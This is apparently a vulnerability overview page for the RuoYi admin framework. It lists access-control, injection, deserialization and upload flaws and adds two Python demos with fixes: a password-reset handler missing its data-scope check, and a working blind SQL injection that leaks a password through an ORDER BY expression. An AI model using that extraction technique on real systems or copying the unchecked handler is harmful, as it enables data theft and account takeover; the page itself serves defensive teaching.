📦 Ruoyi
by Ruoyi
🔍 What is Ruoyi?
RuoYi (GitHub: yangzongzhuan) is an open-source Java back-office management framework built on Spring Boot. The 4.x releases referenced below use Apache Shiro for authentication (its CookieRememberMeManager appears in one entry), Druid for the database connection pool, and ship admin modules for users, roles, departments, menus, notices and scheduled jobs plus a code-generation tool. Most of the entries below are missing or incomplete authorization checks in those admin controllers; the rest are injection (SQL, CSV/formula, XSS, code injection), deserialization, unrestricted upload and default-credential issues.
🛡️ Security Overview
⚠️ Known Vulnerabilities
This vulnerability in RuoYi v4.8.2 allows unauthorized attackers to modify data they shouldn't have access to due to improper access control in the update function. Any organization using the vulnerab...
A privilege escalation vulnerability in RuoYi v4.8.0 allows remote attackers to gain administrative privileges. The cancelAuthUserAll method fails to properly validate whether the requesting user has...
A privilege escalation vulnerability in RuoYi v4.8.0 allows remote attackers to gain elevated privileges through the /editSave method in SysNoticeController. This affects all systems running the vuln...
A privilege escalation vulnerability in RuoYi v4.8.0 allows remote attackers to gain elevated privileges by manipulating the jobId parameter. This affects all systems running the vulnerable version o...
A privilege escalation vulnerability in RuoYi v4.8.0 allows remote attackers to gain elevated privileges through the changeStatus method. This affects all systems running the vulnerable version of Ru...
A privilege escalation vulnerability in RuoYi v4.8.0 allows remote attackers to gain elevated privileges by exploiting improper validation of the deptId parameter in the selectDeptTree method. This a...
RuoYi v4.7.9 and earlier contains a code injection vulnerability in the code generation feature that allows attackers to escape from comments and execute arbitrary code. This affects all systems runni...
RuoYi versions up to 4.6 contain a SQL injection vulnerability in the /system/dept/edit endpoint that allows attackers to execute arbitrary SQL commands. This affects all deployments of RuoYi up to ve...
This vulnerability in RuoYi's CookieRememberMeManager allows remote attackers to escalate privileges by exploiting improper deserialization of remembered user identities. Any system running the affect...
This vulnerability in RuoYi v4.8.2 allows unauthorized attackers to bypass access controls in the selectDept function, enabling them to access sensitive department data without proper authentication. ...
RuoYi v4.8.0 has an incorrect access control vulnerability where the authRole method in SysUserController.java lacks a checkUserDataScope permission check. This allows authenticated users to potential...
This vulnerability in RuoYi 4.8.1 allows attackers to escalate privileges by exploiting a flaw where the owning department has higher rights than the active user. Attackers can gain unauthorized acces...
RuoYi v4.8.0 has an incorrect access control vulnerability in the resetPwd method that allows unauthorized password resets. Attackers can reset passwords of any user account without proper permission ...
This vulnerability in RuoYi v4.8.0 allows remote attackers to escalate privileges by exploiting improper permission validation in the /edit/{dictId} endpoint. Attackers can modify data they shouldn't ...
CVE-2024-57436 is a session ID exposure vulnerability in RuoYi v4.8.0 that allows unauthorized attackers to view admin session IDs through system monitoring. This enables session hijacking where attac...
RuoYi v4.7.2 contains a CSV injection vulnerability in the admin module that allows attackers to embed malicious formulas in exported Excel log files. When victims open these .xlsx files in spreadshee...
This vulnerability allows remote attackers to execute arbitrary code on RuoYi systems up to version 4.8.1 through code injection in the /monitor/cache/getnames endpoint. Attackers can exploit this wit...
RuoYi versions 4.8.1 and earlier contain a stored cross-site scripting (XSS) vulnerability in the menu editing endpoint. Attackers with menu modification permissions can inject malicious scripts that ...
This vulnerability in yangzongzhuan RuoYi up to version 4.8.1 allows attackers to bypass authorization controls by manipulating the userIds parameter in the /system/role/authUser/selectAll endpoint. A...
This SQL injection vulnerability in RuoYi's blacklist handler allows attackers to execute arbitrary SQL commands on affected systems. It affects RuoYi versions up to 4.8.1 and can be exploited remotel...
This vulnerability in RuoYi up to version 4.8.1 involves the use of default credentials in the Druid component configuration file. Attackers can remotely exploit this to gain unauthorized access to th...
This critical vulnerability in RuoYi allows attackers to upload arbitrary files without restrictions via the uploadFile function. Remote attackers can exploit this to upload malicious files like web s...
This vulnerability in RuoYi's Image Source Handler allows attackers to bypass UI layer restrictions, potentially enabling unauthorized interface manipulation. It affects RuoYi versions up to 4.8.1 and...
This vulnerability allows attackers to inject malicious scripts via the configUrl parameter in Swagger UI within RuoYi systems. When exploited, it enables cross-site scripting attacks that can steal s...
A privilege escalation vulnerability in RuoYi v4.8.0 allows remote attackers to gain elevated privileges by manipulating the menuId parameter. This affects systems running the vulnerable version of R...
RuoYi v4.8.0 contains a SQL injection vulnerability in the orderby parameter at the /monitor/online/list endpoint. This allows attackers to execute arbitrary SQL commands on the database. Organization...
This vulnerability in RuoYi v4.8.0 allows administrators to cause a Denial of Service (DoS) by duplicating login names during password resets. The attack requires admin privileges and affects systems ...
This vulnerability in RuoYi up to version 4.8.0 allows remote attackers to execute arbitrary code through deserialization in the getBeanName function of the Whitelist component. Attackers can exploit ...
This cross-site scripting (XSS) vulnerability in RuoYi's code generation tool allows attackers to inject malicious scripts via the sql parameter. When exploited, it enables session hijacking, credenti...
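Many of the entries above (resetPwd, authRole, cancelAuthUserAll, changeStatus, /edit/{dictId}, and the jobId, menuId and deptId parameter items) describe the same defect: the handler acts on whatever record id the request names and never asks whether the caller's data scope reaches that record. The Python model below is an added example, not RuoYi's code; it shows a handler without the check beside the same handler with it. The department tree, users and password store are constructed for the demo, and the scope codes (all / custom department list / own department / own department and children / self only) and the name check_user_data_scope are assumptions about how such a framework labels its role data scopes.

```python
from dataclasses import dataclass

# Role data-scope codes (assumption: the usual all / custom / dept /
# dept-and-children / self scheme of admin frameworks of this kind).
SCOPE_ALL, SCOPE_CUSTOM, SCOPE_DEPT, SCOPE_DEPT_AND_CHILD, SCOPE_SELF = "1", "2", "3", "4", "5"


@dataclass(frozen=True)
class User:
    user_id: int
    dept_id: int
    data_scope: str                        # one of the codes above
    custom_depts: frozenset = frozenset()  # only used with SCOPE_CUSTOM
    is_admin: bool = False


class AccessDenied(Exception):
    pass


# Constructed department tree, dept_id -> parent_id (0 = above the root).
DEPT_PARENT = {100: 0, 101: 100, 102: 100, 103: 101, 104: 102}

# Constructed users: super admin at the root, a manager over 102 and its
# child 104, a department-only user in 101, and two self-only users.
USERS = {
    1: User(1, 100, SCOPE_ALL, is_admin=True),
    2: User(2, 102, SCOPE_DEPT_AND_CHILD),
    3: User(3, 103, SCOPE_SELF),
    4: User(4, 101, SCOPE_DEPT),
    5: User(5, 104, SCOPE_SELF),
}

# Constructed credential store that the handlers below write to.
PASSWORDS = {1: "admin-pw", 2: "mgr-pw", 3: "user-pw", 4: "u4-pw", 5: "u5-pw"}


def dept_subtree(dept_id):
    """Set of department ids at or below dept_id."""
    ids = {dept_id}
    while True:
        grown = {d for d, p in DEPT_PARENT.items() if p in ids} - ids
        if not grown:
            return ids
        ids |= grown


def reachable_depts(actor):
    """Departments whose users the actor's data scope lets them act on."""
    if actor.is_admin or actor.data_scope == SCOPE_ALL:
        return set(DEPT_PARENT)
    if actor.data_scope == SCOPE_CUSTOM:
        return set(actor.custom_depts)
    if actor.data_scope == SCOPE_DEPT:
        return {actor.dept_id}
    if actor.data_scope == SCOPE_DEPT_AND_CHILD:
        return dept_subtree(actor.dept_id)
    return set()  # SCOPE_SELF: no department-level reach at all


def check_user_data_scope(actor, target):
    """Raise AccessDenied unless actor may act on target's record.

    Acting on yourself is always allowed; a non-admin never reaches an
    admin account, which closes the 'reset the administrator' path even
    when the admin sits in a department the actor can otherwise see.
    """
    if actor.user_id == target.user_id:
        return
    if target.is_admin and not actor.is_admin:
        raise AccessDenied(f"user {actor.user_id} may not touch admin {target.user_id}")
    if target.dept_id not in reachable_depts(actor):
        raise AccessDenied(f"user {actor.user_id} may not touch user {target.user_id}")


def reset_pwd_vulnerable(actor, target_id, new_password):
    """Handler that trusts the userId in the request: being logged in is
    the only requirement, so any account can reset any other account."""
    PASSWORDS[target_id] = new_password
    return True


def reset_pwd_fixed(actor, target_id, new_password):
    """Same handler with the data-scope check placed before the write."""
    check_user_data_scope(actor, USERS[target_id])
    PASSWORDS[target_id] = new_password
    return True


def can_reset(actor, target_id):
    """True if the checked handler would let actor reset target_id."""
    try:
        check_user_data_scope(actor, USERS[target_id])
        return True
    except AccessDenied:
        return False


def demo():
    """Self-only user 3 tries to reset the admin through both handlers."""
    outcomes = {"vulnerable": reset_pwd_vulnerable(USERS[3], 1, "pwned")}
    try:
        reset_pwd_fixed(USERS[3], 1, "pwned-again")
        outcomes["fixed"] = True
    except AccessDenied:
        outcomes["fixed"] = False
    return outcomes


if __name__ == "__main__":
    print(demo())
```

The check has to run in every handler that takes a record id from the request (password reset, role assignment, status change, edit/save); a framework-level data-scope filter on list queries does not protect write endpoints that look the record up by id.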
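The orderby entry for /monitor/online/list is a reminder that an ORDER BY clause cannot be passed as a bound parameter, so a sort column concatenated into the SQL string is executed as a sort expression. This added example (not RuoYi's code; the tables, rows and the 'secret' password value are constructed) uses an in-memory SQLite database to show how a concatenated sort expression becomes a blind oracle that reads another table one character at a time, and the allow-list mapping that closes it.

```python
import sqlite3
import string

# Allow-list: sort keys the API accepts -> the column actually used.
# Anything not in this map is rejected before it reaches the SQL string.
ALLOWED_SORT_COLUMNS = {"loginName": "login_name", "loginTime": "login_time"}


def build_db():
    """Constructed schema and rows standing in for a user table and an
    online-session table; the password value is a made-up secret."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE sys_user(user_id INTEGER, login_name TEXT, password TEXT);
        INSERT INTO sys_user VALUES (1, 'admin', 's3cr3t');
        CREATE TABLE sys_user_online(session_id TEXT, login_name TEXT, login_time INTEGER);
        INSERT INTO sys_user_online VALUES ('s-1','zed',1), ('s-2','amy',2), ('s-3','mia',3);
    """)
    return con


def list_online_vulnerable(con, orderby):
    """Concatenates the caller's sort value: the expression is parsed and
    evaluated by the database exactly as supplied."""
    sql = "SELECT session_id FROM sys_user_online ORDER BY " + orderby
    return [row[0] for row in con.execute(sql)]


def list_online_fixed(con, sort_key, direction="asc"):
    """Only a known column name and a known direction ever reach the SQL."""
    column = ALLOWED_SORT_COLUMNS.get(sort_key)
    if column is None or direction.lower() not in ("asc", "desc"):
        raise ValueError("unsupported sort parameter")
    sql = f"SELECT session_id FROM sys_user_online ORDER BY {column} {direction.upper()}"
    return [row[0] for row in con.execute(sql)]


def leak_password_char(con, position):
    """Blind extraction through the sort expression.

    Ordering by login_time returns s-1, s-2, s-3; ordering by login_name
    returns s-2, s-3, s-1. A CASE expression picks one of the two depending
    on a condition over a different table, so which order comes back tells
    the attacker whether the guessed character is right. Returns None when
    no printable character matches (past the end of the value).
    """
    baseline = list_online_vulnerable(con, "login_time")
    for guess in string.printable:
        literal = guess.replace("'", "''")
        payload = (
            "(CASE WHEN (SELECT substr(password, %d, 1) FROM sys_user WHERE user_id = 1) = '%s' "
            "THEN login_time ELSE login_name END)" % (position, literal)
        )
        if list_online_vulnerable(con, payload) == baseline:
            return guess
    return None


def leak_password(con, max_len=16):
    """Drive the oracle character by character until it stops matching."""
    out = ""
    for position in range(1, max_len + 1):
        ch = leak_password_char(con, position)
        if ch is None:
            break
        out += ch
    return out


if __name__ == "__main__":
    db = build_db()
    print("leaked via ORDER BY:", leak_password(db))
    print("fixed endpoint:", list_online_fixed(db, "loginName", "desc"))
```

An allow-list keyed on the API's own sort names is preferable to a deny-list regex that strips SQL keywords from the raw value: the map admits nothing the developer did not enumerate, and it also keeps internal column names out of the API surface.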